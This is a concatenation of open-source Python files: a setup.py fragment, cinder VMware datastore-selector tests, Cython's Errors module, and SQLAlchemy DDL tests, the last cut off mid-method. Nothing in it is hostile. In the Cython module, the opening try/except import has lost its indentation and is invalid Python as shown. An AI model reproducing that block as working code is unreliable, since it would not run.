    download_url=download_url,
    long_description=description,
    platforms=['Linux', 'Mac OSX', 'Windows'],
    license='BSD',
    setup_requires=["Cython", "numpy"],
    install_requires=["Cython", "numpy", "six"],
    classifiers=classifiers,
    ext_package='kapteyn',
    # lazy_cythonize defers cythonize() until setup_requires has run.
    ext_modules=lazy_cythonize(extensions),
    package_dir={'kapteyn': 'kapteyn'},
    packages=['kapteyn'],
    package_data={'kapteyn': ['lut/*.lut']},
)
|
|
# Copyright (c) 2014 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit tests for datastore module.
"""
import mock
from oslo_utils import units
from oslo_vmware import exceptions
from cinder import test
from cinder.volume.drivers.vmware import datastore as ds_sel
from cinder.volume.drivers.vmware import exceptions as vmdk_exceptions
class DatastoreTest(test.TestCase):
    """Unit tests for Datastore."""

    def setUp(self):
        super(DatastoreTest, self).setUp()
        # Mocked vSphere session and volume-ops facade injected into the
        # selector under test.
        self._session = mock.Mock()
        self._vops = mock.Mock()
        self._ds_sel = ds_sel.DatastoreSelector(self._vops, self._session)

    @mock.patch('oslo_vmware.pbm.get_profile_id_by_name')
    def test_get_profile_id(self, get_profile_id_by_name):
        """get_profile_id delegates to pbm and returns its result."""
        profile_id = mock.sentinel.profile_id
        get_profile_id_by_name.return_value = profile_id
        profile_name = mock.sentinel.profile_name
        self.assertEqual(profile_id, self._ds_sel.get_profile_id(profile_name))
        get_profile_id_by_name.assert_called_once_with(self._session,
                                                       profile_name)

    @mock.patch('oslo_vmware.pbm.get_profile_id_by_name')
    def test_get_profile_id_with_invalid_profile(self, get_profile_id_by_name):
        """An unknown profile name raises ProfileNotFoundException."""
        get_profile_id_by_name.return_value = None
        profile_name = mock.sentinel.profile_name
        self.assertRaises(vmdk_exceptions.ProfileNotFoundException,
                          self._ds_sel.get_profile_id,
                          profile_name)
        get_profile_id_by_name.assert_called_once_with(self._session,
                                                       profile_name)

    def _create_datastore(self, moref):
        # Minimal datastore stand-in: only the managed-object ref value is used.
        return mock.Mock(value=moref)

    def _create_summary(
            self, ds, free_space=units.Mi, _type=ds_sel.DatastoreType.VMFS,
            capacity=2 * units.Mi):
        # Fake DatastoreSummary with the fields the selector reads.
        return mock.Mock(datastore=ds, freeSpace=free_space, type=_type,
                         capacity=capacity)

    def _create_host(self, value):
        # Fake HostSystem managed-object reference.
        host = mock.Mock(spec=['_type', 'value'])
        host._type = 'HostSystem'
        host.value = value
        return host

    @mock.patch('cinder.volume.drivers.vmware.datastore.DatastoreSelector.'
                '_filter_by_profile')
    def test_filter_datastores(self, filter_by_profile):
        """Exercise _filter_datastores through progressively richer inputs."""
        # Test with empty datastore list.
        datastores = []
        size_bytes = 2 * units.Mi
        profile_id = mock.sentinel.profile_id
        hard_anti_affinity_datastores = None
        hard_affinity_ds_types = None
        self.assertEqual([], self._ds_sel._filter_datastores(
            datastores, size_bytes, profile_id, hard_anti_affinity_datastores,
            hard_affinity_ds_types))

        # Test with single datastore with hard anti-affinity.
        ds_1 = self._create_datastore('ds-1')
        datastores = [ds_1]
        hard_anti_affinity_datastores = [ds_1.value]
        self.assertEqual([], self._ds_sel._filter_datastores(
            datastores, size_bytes, profile_id, hard_anti_affinity_datastores,
            hard_affinity_ds_types))

        # Extend previous case with a profile non-compliant datastore.
        ds_2 = self._create_datastore('ds-2')
        datastores.append(ds_2)
        filter_by_profile.return_value = []
        self.assertEqual([], self._ds_sel._filter_datastores(
            datastores, size_bytes, profile_id, hard_anti_affinity_datastores,
            hard_affinity_ds_types))
        filter_by_profile.assert_called_once_with([ds_2], profile_id)

        # Extend previous case with a less free space datastore.
        ds_3 = self._create_datastore('ds-3')
        datastores.append(ds_3)
        filter_by_profile.return_value = [ds_3]
        free_space_list = [units.Mi]
        type_list = [ds_sel.DatastoreType.NFS]
        self._vops.get_summary.side_effect = (
            lambda ds: self._create_summary(ds,
                                            free_space_list.pop(0),
                                            type_list.pop(0)))
        self.assertEqual([], self._ds_sel._filter_datastores(
            datastores, size_bytes, profile_id, hard_anti_affinity_datastores,
            hard_affinity_ds_types))

        # Extend previous case with a datastore not satisfying hard affinity
        # datastore type requirement.
        ds_4 = self._create_datastore('ds-4')
        datastores.append(ds_4)
        filter_by_profile.return_value = [ds_3, ds_4]
        free_space_list = [units.Mi, 4 * units.Mi]
        type_list = [ds_sel.DatastoreType.NFS, ds_sel.DatastoreType.VSAN]
        hard_affinity_ds_types = [ds_sel.DatastoreType.NFS]
        self.assertEqual([], self._ds_sel._filter_datastores(
            datastores, size_bytes, profile_id, hard_anti_affinity_datastores,
            hard_affinity_ds_types))

        # Modify the previous case to remove hard affinity datastore type
        # requirement.
        free_space_list = [units.Mi, 4 * units.Mi]
        type_list = [ds_sel.DatastoreType.NFS, ds_sel.DatastoreType.VSAN]
        hard_affinity_ds_types = None
        res = self._ds_sel._filter_datastores(
            datastores, size_bytes, profile_id, hard_anti_affinity_datastores,
            hard_affinity_ds_types)
        self.assertTrue(len(res) == 1)
        self.assertEqual(ds_4, res[0].datastore)

        # Extend the previous case by adding a datastore satisfying
        # hard affinity datastore type requirement.
        ds_5 = self._create_datastore('ds-5')
        datastores.append(ds_5)
        filter_by_profile.return_value = [ds_3, ds_4, ds_5]
        free_space_list = [units.Mi, 4 * units.Mi, 5 * units.Mi]
        type_list = [ds_sel.DatastoreType.NFS, ds_sel.DatastoreType.VSAN,
                     ds_sel.DatastoreType.VMFS]
        hard_affinity_ds_types = [ds_sel.DatastoreType.VMFS]
        res = self._ds_sel._filter_datastores(
            datastores, size_bytes, profile_id, hard_anti_affinity_datastores,
            hard_affinity_ds_types)
        self.assertTrue(len(res) == 1)
        self.assertEqual(ds_5, res[0].datastore)

        # Modify the previous case to have two datastores satisfying
        # hard affinity datastore type requirement.
        free_space_list = [units.Mi, 4 * units.Mi, 5 * units.Mi]
        type_list = [ds_sel.DatastoreType.NFS, ds_sel.DatastoreType.VSAN,
                     ds_sel.DatastoreType.VSAN]
        hard_affinity_ds_types = [ds_sel.DatastoreType.VSAN]
        res = self._ds_sel._filter_datastores(
            datastores, size_bytes, profile_id, hard_anti_affinity_datastores,
            hard_affinity_ds_types)
        self.assertTrue(len(res) == 2)
        self.assertEqual(ds_4, res[0].datastore)
        self.assertEqual(ds_5, res[1].datastore)

        # Clear side effects.
        self._vops.get_summary.side_effect = None

    def test_select_best_summary(self):
        """The summary with most connected hosts (then best utilization) wins."""
        # No tie-- all datastores with different host mount count.
        summary_1 = self._create_summary(mock.sentinel.ds_1,
                                         free_space=units.Mi,
                                         capacity=2 * units.Mi)
        summary_2 = self._create_summary(mock.sentinel.ds_2,
                                         free_space=units.Mi,
                                         capacity=3 * units.Mi)
        summary_3 = self._create_summary(mock.sentinel.ds_3,
                                         free_space=units.Mi,
                                         capacity=4 * units.Mi)
        host_1 = self._create_host('host-1')
        host_2 = self._create_host('host-2')
        host_3 = self._create_host('host-3')
        connected_hosts = {mock.sentinel.ds_1: [host_1.value],
                           mock.sentinel.ds_2: [host_1.value, host_2.value],
                           mock.sentinel.ds_3: [host_1.value, host_2.value,
                                                host_3.value]}
        self._vops.get_connected_hosts.side_effect = (
            lambda summary: connected_hosts[summary])
        summaries = [summary_1, summary_2, summary_3]
        (best_summary, best_utilization) = self._ds_sel._select_best_summary(
            summaries)
        self.assertEqual(summary_3, best_summary)
        self.assertEqual(3 / 4.0, best_utilization)

        # Tie-- two datastores with max host mount count.
        summary_4 = self._create_summary(mock.sentinel.ds_4,
                                         free_space=2 * units.Mi,
                                         capacity=4 * units.Mi)
        connected_hosts[mock.sentinel.ds_4] = (
            connected_hosts[mock.sentinel.ds_3])
        summaries.append(summary_4)
        (best_summary, best_utilization) = self._ds_sel._select_best_summary(
            summaries)
        self.assertEqual(summary_4, best_summary)
        self.assertEqual(1 / 2.0, best_utilization)

        # Clear side effects.
        self._vops.get_connected_hosts.side_effect = None

    @mock.patch('cinder.volume.drivers.vmware.datastore.DatastoreSelector.'
                'get_profile_id')
    @mock.patch('cinder.volume.drivers.vmware.datastore.DatastoreSelector.'
                '_filter_datastores')
    def test_select_datastore(self, filter_datastores, get_profile_id):
        """End-to-end select_datastore scenarios over mocked hosts/datastores."""
        # Test with no hosts.
        size_bytes = units.Ki
        req = {self._ds_sel.SIZE_BYTES: size_bytes}
        self._vops.get_hosts.return_value = mock.Mock(objects=[])
        self.assertEqual((), self._ds_sel.select_datastore(req))
        self._vops.get_hosts.assert_called_once_with()

        # Test with single host with no valid datastores.
        host_1 = self._create_host('host-1')
        self._vops.get_hosts.return_value = mock.Mock(
            objects=[mock.Mock(obj=host_1)])
        self._vops.continue_retrieval.return_value = None
        self._vops.get_dss_rp.side_effect = exceptions.VimException('error')
        self.assertEqual((), self._ds_sel.select_datastore(req))
        self._vops.get_dss_rp.assert_called_once_with(host_1)

        # Test with three hosts and vCenter connection problem while fetching
        # datastores for the second host.
        self._vops.get_dss_rp.reset_mock()
        host_2 = self._create_host('host-2')
        host_3 = self._create_host('host-3')
        self._vops.get_hosts.return_value = mock.Mock(
            objects=[mock.Mock(obj=host_1),
                     mock.Mock(obj=host_2),
                     mock.Mock(obj=host_3)])
        self._vops.get_dss_rp.side_effect = [
            exceptions.VimException('no valid datastores'),
            exceptions.VimConnectionException('connection error')]
        self.assertRaises(exceptions.VimConnectionException,
                          self._ds_sel.select_datastore,
                          req)
        get_dss_rp_exp_calls = [mock.call(host_1), mock.call(host_2)]
        self.assertEqual(get_dss_rp_exp_calls,
                         self._vops.get_dss_rp.call_args_list)

        # Modify previous case to return datastores for second and third host,
        # where none of them meet the requirements which include a storage
        # profile and affinity requirements.
        aff_ds_types = [ds_sel.DatastoreType.VMFS]
        req[ds_sel.DatastoreSelector.HARD_AFFINITY_DS_TYPE] = aff_ds_types
        ds_1a = mock.sentinel.ds_1a
        anti_affinity_ds = [ds_1a]
        req[ds_sel.DatastoreSelector.HARD_ANTI_AFFINITY_DS] = anti_affinity_ds
        profile_name = mock.sentinel.profile_name
        req[ds_sel.DatastoreSelector.PROFILE_NAME] = profile_name
        profile_id = mock.sentinel.profile_id
        get_profile_id.return_value = profile_id
        ds_2a = mock.sentinel.ds_2a
        ds_2b = mock.sentinel.ds_2b
        ds_3a = mock.sentinel.ds_3a
        self._vops.get_dss_rp.reset_mock()
        rp_2 = mock.sentinel.rp_2
        rp_3 = mock.sentinel.rp_3
        self._vops.get_dss_rp.side_effect = [
            exceptions.VimException('no valid datastores'),
            ([ds_2a, ds_2b], rp_2),
            ([ds_3a], rp_3)]
        filter_datastores.return_value = []
        self.assertEqual((), self._ds_sel.select_datastore(req))
        get_profile_id.assert_called_once_with(profile_name)
        get_dss_rp_exp_calls.append(mock.call(host_3))
        self.assertEqual(get_dss_rp_exp_calls,
                         self._vops.get_dss_rp.call_args_list)
        filter_datastores_exp_calls = [
            mock.call([ds_2a, ds_2b], size_bytes, profile_id, anti_affinity_ds,
                      aff_ds_types),
            mock.call([ds_3a], size_bytes, profile_id, anti_affinity_ds,
                      aff_ds_types)]
        self.assertEqual(filter_datastores_exp_calls,
                         filter_datastores.call_args_list)

        # Modify previous case to have a non-empty summary list after filtering
        # with preferred utilization threshold unset.
        self._vops.get_dss_rp.side_effect = [
            exceptions.VimException('no valid datastores'),
            ([ds_2a, ds_2b], rp_2),
            ([ds_3a], rp_3)]
        summary_2b = self._create_summary(ds_2b, free_space=0.5 * units.Mi,
                                          capacity=units.Mi)
        filter_datastores.side_effect = [[summary_2b]]
        self._vops.get_connected_hosts.return_value = [host_1]
        self.assertEqual((host_2, rp_2, summary_2b),
                         self._ds_sel.select_datastore(req))

        # Modify previous case to have a preferred utilization threshold
        # satsified by one datastore.
        self._vops.get_dss_rp.side_effect = [
            exceptions.VimException('no valid datastores'),
            ([ds_2a, ds_2b], rp_2),
            ([ds_3a], rp_3)]
        req[ds_sel.DatastoreSelector.PREF_UTIL_THRESH] = 0.4
        summary_3a = self._create_summary(ds_3a, free_space=0.7 * units.Mi,
                                          capacity=units.Mi)
        filter_datastores.side_effect = [[summary_2b], [summary_3a]]
        self.assertEqual((host_3, rp_3, summary_3a),
                         self._ds_sel.select_datastore(req))

        # Modify previous case to have a preferred utilization threshold
        # which cannot be satisfied.
        self._vops.get_dss_rp.side_effect = [
            exceptions.VimException('no valid datastores'),
            ([ds_2a, ds_2b], rp_2),
            ([ds_3a], rp_3)]
        filter_datastores.side_effect = [[summary_2b], [summary_3a]]
        req[ds_sel.DatastoreSelector.PREF_UTIL_THRESH] = 0.2
        summary_2b.freeSpace = 0.75 * units.Mi
        self.assertEqual((host_2, rp_2, summary_2b),
                         self._ds_sel.select_datastore(req))

        # Clear side effects.
        self._vops.get_dss_rp.side_effect = None

    @mock.patch('cinder.volume.drivers.vmware.datastore.DatastoreSelector.'
                '_filter_datastores')
    def test_select_datastore_with_single_host(self, filter_datastores):
        """An explicit hosts list bypasses get_hosts()."""
        host = self._create_host('host-1')
        req = {self._ds_sel.SIZE_BYTES: units.Gi}
        ds = mock.sentinel.ds
        rp = mock.sentinel.rp
        self._vops.get_dss_rp.return_value = ([ds], rp)
        summary = self._create_summary(ds, free_space=2 * units.Gi,
                                       capacity=3 * units.Gi)
        filter_datastores.return_value = [summary]
        self._vops.get_connected_hosts.return_value = [host.value]
        self.assertEqual((host, rp, summary),
                         self._ds_sel.select_datastore(req, [host]))

        # reset mocks
        self._vops.get_dss_rp.reset_mock()
        self._vops.get_dss_rp.return_value = None
        self._vops.get_connected_hosts.reset_mock()
        self._vops.get_connected_hosts.return_value = None

    def test_select_datastore_with_empty_host_list(self):
        """hosts=[] falls back to retrieving all hosts (which is empty here)."""
        size_bytes = units.Ki
        req = {self._ds_sel.SIZE_BYTES: size_bytes}
        self._vops.get_hosts.return_value = mock.Mock(objects=[])
        self.assertEqual((), self._ds_sel.select_datastore(req, hosts=[]))
        self._vops.get_hosts.assert_called_once_with()

    @mock.patch('oslo_vmware.pbm.get_profile_id_by_name')
    @mock.patch('cinder.volume.drivers.vmware.datastore.DatastoreSelector.'
                '_filter_by_profile')
    def test_is_datastore_compliant(self, filter_by_profile,
                                    get_profile_id_by_name):
        """Compliance check: no profile, bad profile, non-compliant, compliant."""
        # Test with empty profile.
        profile_name = None
        datastore = mock.sentinel.datastore
        self.assertTrue(self._ds_sel.is_datastore_compliant(datastore,
                                                            profile_name))

        # Test with invalid profile.
        profile_name = mock.sentinel.profile_name
        get_profile_id_by_name.return_value = None
        self.assertRaises(vmdk_exceptions.ProfileNotFoundException,
                          self._ds_sel.is_datastore_compliant,
                          datastore,
                          profile_name)
        get_profile_id_by_name.assert_called_once_with(self._session,
                                                       profile_name)

        # Test with valid profile and non-compliant datastore.
        get_profile_id_by_name.reset_mock()
        profile_id = mock.sentinel.profile_id
        get_profile_id_by_name.return_value = profile_id
        filter_by_profile.return_value = []
        self.assertFalse(self._ds_sel.is_datastore_compliant(datastore,
                                                             profile_name))
        get_profile_id_by_name.assert_called_once_with(self._session,
                                                       profile_name)
        filter_by_profile.assert_called_once_with([datastore], profile_id)

        # Test with valid profile and compliant datastore.
        get_profile_id_by_name.reset_mock()
        filter_by_profile.reset_mock()
        filter_by_profile.return_value = [datastore]
        self.assertTrue(self._ds_sel.is_datastore_compliant(datastore,
                                                            profile_name))
        get_profile_id_by_name.assert_called_once_with(self._session,
                                                       profile_name)
        filter_by_profile.assert_called_once_with([datastore], profile_id)

    def test_get_all_hosts(self):
        """_get_all_hosts returns only hosts reported usable by vops."""
        host_1 = self._create_host('host-1')
        host_2 = self._create_host('host-2')
        hosts = mock.Mock(objects=[mock.Mock(obj=host_1),
                                   mock.Mock(obj=host_2)])
        self._vops.get_hosts.return_value = hosts
        self._vops.continue_retrieval.return_value = None
        # host_1 is usable and host_2 is not usable
        self._vops.is_host_usable.side_effect = [True, False]
        ret = self._ds_sel._get_all_hosts()
        self.assertEqual([host_1], ret)
        self._vops.get_hosts.assert_called_once_with()
        self._vops.continue_retrieval.assert_called_once_with(hosts)
        exp_calls = [mock.call(host_1), mock.call(host_2)]
        self.assertEqual(exp_calls, self._vops.is_host_usable.call_args_list)
|
|
#
# Errors
#
from __future__ import absolute_import
try:
from __builtin__ import basestring as any_string_type
except ImportError:
any_string_type = (bytes, str)
import sys
from contextlib import contextmanager
from ..Utils import open_new_file
from . import DebugFlags
from . import Options
class PyrexError(Exception):
    """Base class for all user-visible Cython (Pyrex) compilation errors."""
    pass
class PyrexWarning(Exception):
    """Base class for all Cython (Pyrex) compilation warnings."""
    pass
def context(position):
    """Return a source excerpt around *position* (a (source, line, col)
    tuple), framed by dashed lines, with a caret marking the column.
    """
    source = position[0]
    assert not (isinstance(source, any_string_type)), (
        "Please replace filename strings with Scanning.FileSourceDescriptor instances %r" % source)
    try:
        lines = source.get_lines()
    except UnicodeDecodeError:
        # file has an encoding problem
        excerpt = u"[unprintable code]\n"
    else:
        start = max(0, position[1] - 6)
        excerpt = u''.join(lines[start:position[1]])
        excerpt = u'...\n%s%s^\n' % (excerpt, u' ' * (position[2] - 1))
    return u'%s\n%s%s\n' % (u'-' * 60, excerpt, u'-' * 60)
def format_position(position):
    """Render *position* as u"<file>:<line>:<col>: ", or u'' when unknown."""
    if not position:
        return u''
    return u"%s:%d:%d: " % (position[0].get_error_description(),
                            position[1], position[2])
def format_error(message, position):
    """Prefix *message* with position info and a source excerpt when the
    position is known; otherwise return the message unchanged.
    """
    if not position:
        return message
    pos_str = format_position(position)
    cont = context(position)
    return u'\nError compiling Cython file:\n%s\n%s%s' % (cont, pos_str, message or u'')
class CompileError(PyrexError):
    """An error at a specific source position, pre-formatted for display
    via format_error()."""
    def __init__(self, position = None, message = u""):
        self.position = position
        self.message_only = message
        self.formatted_message = format_error(message, position)
        self.reported = False
        # Deprecated and withdrawn in 2.6:
        # self.message = message
        Exception.__init__(self, self.formatted_message)
        # Python Exception subclass pickling is broken,
        # see http://bugs.python.org/issue1692335
        self.args = (position, message)
    def __str__(self):
        return self.formatted_message
class CompileWarning(PyrexWarning):
    """A warning at a specific source position; str() yields the
    position-prefixed message."""
    def __init__(self, position = None, message = ""):
        self.position = position
        # Deprecated and withdrawn in 2.6:
        # self.message = message
        Exception.__init__(self, format_position(position) + message)
class InternalError(Exception):
    """If this is ever raised, there is a bug in the compiler."""

    def __init__(self, message):
        self.message_only = message
        Exception.__init__(self, u"Internal compiler error: %s" % message)
class AbortError(Exception):
    """Thrown to stop the compilation immediately."""

    def __init__(self, message):
        self.message_only = message
        Exception.__init__(self, u"Abort error: %s" % message)
class CompilerCrash(CompileError):
    # raised when an unexpected exception occurs in a transform
    def __init__(self, pos, context, message, cause, stacktrace=None):
        # Assemble one message combining the crash context, the original
        # message, the formatted traceback (if any) and the causing exception.
        if message:
            message = u'\n' + message
        else:
            message = u'\n'
        self.message_only = message
        if context:
            message = u"Compiler crash in %s%s" % (context, message)
        if stacktrace:
            import traceback
            message += (
                u'\n\nCompiler crash traceback from this point on:\n' +
                u''.join(traceback.format_tb(stacktrace)))
        if cause:
            if not stacktrace:
                message += u'\n'
            message += u'%s: %s' % (cause.__class__.__name__, cause)
        CompileError.__init__(self, pos, message)
        # Python Exception subclass pickling is broken,
        # see http://bugs.python.org/issue1692335
        self.args = (pos, context, message, cause, stacktrace)
class NoElementTreeInstalledException(PyrexError):
    """Raised when the user enabled options.gdb_debug but no ElementTree
    implementation was found.
    """
# Module-level reporting state (reset via open_listing_file()).
listing_file = None  # file object receiving error lines, or None
num_errors = 0       # count of errors reported so far
echo_file = None     # secondary stream (usually stderr) echoing errors
def open_listing_file(path, echo_to_stderr = 1):
    """Begin a new error listing. If *path* is None, no file is opened and
    only the error counter is reset.
    """
    global listing_file, num_errors, echo_file
    listing_file = open_new_file(path) if path is not None else None
    echo_file = sys.stderr if echo_to_stderr else None
    num_errors = 0
def close_listing_file():
    """Close the current error listing file, if one is open."""
    global listing_file
    if not listing_file:
        return
    listing_file.close()
    listing_file = None
def report_error(err, use_stack=True):
    """Report *err*: buffer it when errors are being held (see hold_errors()),
    otherwise write it to the listing/echo streams and bump num_errors.
    Raises AbortError when Options.fast_fail is set.
    """
    if error_stack and use_stack:
        error_stack[-1].append(err)
    else:
        global num_errors
        # See Main.py for why dual reporting occurs. Quick fix for now.
        if err.reported: return
        err.reported = True
        try: line = u"%s\n" % err
        except UnicodeEncodeError:
            # Python <= 2.5 does this for non-ASCII Unicode exceptions
            line = format_error(getattr(err, 'message_only', "[unprintable exception message]"),
                                getattr(err, 'position', None)) + u'\n'
        if listing_file:
            try: listing_file.write(line)
            except UnicodeEncodeError:
                listing_file.write(line.encode('ASCII', 'replace'))
        if echo_file:
            try: echo_file.write(line)
            except UnicodeEncodeError:
                echo_file.write(line.encode('ASCII', 'replace'))
        num_errors += 1
        if Options.fast_fail:
            raise AbortError("fatal errors")
def error(position, message):
    """Create, report and return a CompileError at *position*.

    A missing position indicates a compiler bug, hence InternalError.
    """
    if position is None:
        raise InternalError(message)
    err = CompileError(position, message)
    if DebugFlags.debug_exception_on_error:
        raise Exception(err)  # debug
    report_error(err)
    return err
LEVEL = 1 # minimum level for message()/warning()/warn_once() to be emitted
def message(position, message, level=1):
    """Emit an informational note; returns the CompileWarning, or None
    when suppressed by LEVEL.
    """
    if level < LEVEL:
        return
    warn = CompileWarning(position, message)
    line = "note: %s\n" % warn
    for out in (listing_file, echo_file):
        if out:
            out.write(line)
    return warn
def warning(position, message, level=0):
    """Emit a warning; promoted to an error when Options.warning_errors is
    set and a position is known. Returns the CompileWarning/CompileError.
    """
    if level < LEVEL:
        return
    if Options.warning_errors and position:
        return error(position, message)
    warn = CompileWarning(position, message)
    line = "warning: %s\n" % warn
    for out in (listing_file, echo_file):
        if out:
            out.write(line)
    return warn
_warn_once_seen = {}  # messages already emitted by warn_once()
def warn_once(position, message, level=0):
    """Like warning(), but each distinct message text is emitted only once
    per compiler run (see reset()).
    """
    if level < LEVEL or message in _warn_once_seen:
        return
    warn = CompileWarning(position, message)
    line = "warning: %s\n" % warn
    for out in (listing_file, echo_file):
        if out:
            out.write(line)
    _warn_once_seen[message] = True
    return warn
# These functions can be used to momentarily suppress errors.
error_stack = []  # stack of lists of held CompileErrors (see hold_errors())
def hold_errors():
    """Start buffering reported errors instead of emitting them."""
    error_stack.append([])
def release_errors(ignore=False):
    """Stop buffering; re-report the held errors unless *ignore* is true."""
    held = error_stack.pop()
    if ignore:
        return
    for err in held:
        report_error(err)
def held_errors():
    """Return the list currently collecting held errors."""
    return error_stack[-1]
# Context-manager equivalent of hold_errors()/release_errors():
@contextmanager
def local_errors(ignore=False):
    """Context-manager form of hold_errors()/release_errors(); yields the
    list that collects errors raised inside the block.
    """
    held = []
    error_stack.append(held)
    try:
        yield held
    finally:
        release_errors(ignore=ignore)
# this module needs a redesign to support parallel cythonisation, but
# for now, the following works at least in sequential compiler runs
def reset():
    """Clear the warn-once cache and drop any held errors."""
    _warn_once_seen.clear()
    error_stack[:] = []
|
|
from sqlalchemy import Column
from sqlalchemy import ForeignKey
from sqlalchemy import Index
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import schema
from sqlalchemy import Sequence
from sqlalchemy import Table
from sqlalchemy.sql.ddl import SchemaDropper
from sqlalchemy.sql.ddl import SchemaGenerator
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.mock import Mock
class EmitDDLTest(fixtures.TestBase):
    """Verify which DDL constructs SchemaGenerator/SchemaDropper emit
    against a mock connection, in particular how ``checkfirst`` interacts
    with the dialect's has_table/has_sequence/has_index existence checks.
    """
    def _mock_connection(self, item_exists):
        # All dialect existence checks route through item_exists(name).
        def has_item(connection, name, schema):
            return item_exists(name)
        def has_index(connection, tablename, idxname, schema):
            return item_exists(idxname)
        return Mock(
            dialect=Mock(
                supports_sequences=True,
                has_table=Mock(side_effect=has_item),
                has_sequence=Mock(side_effect=has_item),
                has_index=Mock(side_effect=has_index),
                supports_comments=True,
                inline_comments=False,
            ),
            _schema_translate_map=None,
        )
    def _mock_create_fixture(
        self, checkfirst, tables, item_exists=lambda item: False
    ):
        # SchemaGenerator over a mock connection; by default nothing exists.
        connection = self._mock_connection(item_exists)
        return SchemaGenerator(
            connection.dialect,
            connection,
            checkfirst=checkfirst,
            tables=tables,
        )
    def _mock_drop_fixture(
        self, checkfirst, tables, item_exists=lambda item: True
    ):
        # SchemaDropper over a mock connection; by default everything exists.
        connection = self._mock_connection(item_exists)
        return SchemaDropper(
            connection.dialect,
            connection,
            checkfirst=checkfirst,
            tables=tables,
        )
    def _table_fixture(self):
        # (metadata, t1..t5), each a single-column table.
        m = MetaData()
        return (m,) + tuple(
            Table("t%d" % i, m, Column("x", Integer)) for i in range(1, 6)
        )
    def _use_alter_fixture_one(self):
        # Two tables with mutually-referencing FKs (forces ALTER for one).
        m = MetaData()
        t1 = Table(
            "t1",
            m,
            Column("id", Integer, primary_key=True),
            Column("t2id", Integer, ForeignKey("t2.id")),
        )
        t2 = Table(
            "t2",
            m,
            Column("id", Integer, primary_key=True),
            Column("t1id", Integer, ForeignKey("t1.id")),
        )
        return m, t1, t2
    def _fk_fixture_one(self):
        # One-way FK from t1 to t2 (can be rendered inline).
        m = MetaData()
        t1 = Table(
            "t1",
            m,
            Column("id", Integer, primary_key=True),
            Column("t2id", Integer, ForeignKey("t2.id")),
        )
        t2 = Table("t2", m, Column("id", Integer, primary_key=True))
        return m, t1, t2
    def _table_index_fixture(self):
        # A table plus a two-column index on it.
        m = MetaData()
        t1 = Table("t1", m, Column("x", Integer), Column("y", Integer))
        i1 = Index("my_idx", t1.c.x, t1.c.y)
        return m, t1, i1
    def _table_seq_fixture(self):
        # Two tables whose PK columns draw from explicit sequences.
        m = MetaData()
        s1 = Sequence("s1")
        s2 = Sequence("s2")
        t1 = Table("t1", m, Column("x", Integer, s1, primary_key=True))
        t2 = Table("t2", m, Column("x", Integer, s2, primary_key=True))
        return m, t1, t2, s1, s2
    def _table_comment_fixture(self):
        # A table with comments on both the table and a column.
        m = MetaData()
        c1 = Column("id", Integer, comment="c1")
        t1 = Table("t1", m, c1, comment="t1")
        return m, t1, c1
    def test_comment(self):
        m, t1, c1 = self._table_comment_fixture()
        generator = self._mock_create_fixture(
            False, [t1], item_exists=lambda t: t not in ("t1",)
        )
        self._assert_create_comment([t1, t1, c1], generator, m)
    def test_create_seq_checkfirst(self):
        m, t1, t2, s1, s2 = self._table_seq_fixture()
        generator = self._mock_create_fixture(
            True, [t1, t2], item_exists=lambda t: t not in ("t1", "s1")
        )
        self._assert_create([t1, s1], generator, m)
    def test_drop_seq_checkfirst(self):
        m, t1, t2, s1, s2 = self._table_seq_fixture()
        generator = self._mock_drop_fixture(
            True, [t1, t2], item_exists=lambda t: t in ("t1", "s1")
        )
        self._assert_drop([t1, s1], generator, m)
    def test_create_table_index_checkfirst(self):
        """create table that doesn't exist should not require a check
        on the index"""
        m, t1, i1 = self._table_index_fixture()
        def exists(name):
            if name == "my_idx":
                raise NotImplementedError()
            else:
                return False
        generator = self._mock_create_fixture(True, [t1], item_exists=exists)
        self._assert_create([t1, i1], generator, t1)
    def test_create_table_exists_index_checkfirst(self):
        """for the moment, if the table *does* exist, we are not checking
        for the index. this can possibly be changed."""
        m, t1, i1 = self._table_index_fixture()
        def exists(name):
            if name == "my_idx":
                raise NotImplementedError()
            else:
                return True
        generator = self._mock_create_fixture(True, [t1], item_exists=exists)
        # nothing is created
        self._assert_create([], generator, t1)
    def test_drop_table_index_checkfirst(self):
        m, t1, i1 = self._table_index_fixture()
        def exists(name):
            if name == "my_idx":
                raise NotImplementedError()
            else:
                return True
        generator = self._mock_drop_fixture(True, [t1], item_exists=exists)
        self._assert_drop_tables([t1], generator, t1)
    def test_create_index_checkfirst_exists(self):
        m, t1, i1 = self._table_index_fixture()
        generator = self._mock_create_fixture(
            True, [i1], item_exists=lambda idx: True
        )
        self._assert_create_index([], generator, i1)
    def test_create_index_checkfirst_doesnt_exist(self):
        m, t1, i1 = self._table_index_fixture()
        generator = self._mock_create_fixture(
            True, [i1], item_exists=lambda idx: False
        )
        self._assert_create_index([i1], generator, i1)
    def test_create_index_nocheck_exists(self):
        m, t1, i1 = self._table_index_fixture()
        generator = self._mock_create_fixture(
            False, [i1], item_exists=lambda idx: True
        )
        self._assert_create_index([i1], generator, i1)
    def test_create_index_nocheck_doesnt_exist(self):
        m, t1, i1 = self._table_index_fixture()
        generator = self._mock_create_fixture(
            False, [i1], item_exists=lambda idx: False
        )
        self._assert_create_index([i1], generator, i1)
    def test_drop_index_checkfirst_exists(self):
        m, t1, i1 = self._table_index_fixture()
        generator = self._mock_drop_fixture(
            True, [i1], item_exists=lambda idx: True
        )
        self._assert_drop_index([i1], generator, i1)
    def test_drop_index_checkfirst_doesnt_exist(self):
        m, t1, i1 = self._table_index_fixture()
        generator = self._mock_drop_fixture(
            True, [i1], item_exists=lambda idx: False
        )
        self._assert_drop_index([], generator, i1)
    def test_drop_index_nocheck_exists(self):
        m, t1, i1 = self._table_index_fixture()
        generator = self._mock_drop_fixture(
            False, [i1], item_exists=lambda idx: True
        )
        self._assert_drop_index([i1], generator, i1)
    def test_drop_index_nocheck_doesnt_exist(self):
        m, t1, i1 = self._table_index_fixture()
        generator = self._mock_drop_fixture(
            False, [i1], item_exists=lambda idx: False
        )
        self._assert_drop_index([i1], generator, i1)
    def test_create_collection_checkfirst(self):
